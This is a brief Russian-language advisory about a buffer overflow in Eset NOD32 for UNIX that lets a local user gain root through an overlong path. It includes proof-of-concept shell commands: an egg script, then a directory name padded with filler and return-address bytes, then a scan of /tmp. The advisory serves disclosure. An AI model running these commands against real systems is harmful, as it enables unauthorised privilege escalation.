Переполнение буфера обнаружено в антивирусе
Eset NOD32 для UNIX систем. Локальный пользователь может получить root привилегии.
iDEFENSE сообщил, что местный пользователь может создать имя пути длиннее 500 символов, которое вызовет переполнение буфера в NOD32 при попытке просмотреть этот путь. Уязвимость позволяет перезаписать EAX и ECX регистр, в результате чего становится возможным выполнение произвольного кода с привилегиями сканирующего процесса (root пользователь). Пример:
$ perl eggnod.pl
$ mkdir -p /tmp/`perl -e 'print "A" x 255'`/`perl -e 'print "B" x 240 .
"\xfc\xbf\xbf"'`
$ nod32 /tmp
Уязвимость обнаружена в NOD32 1.012.
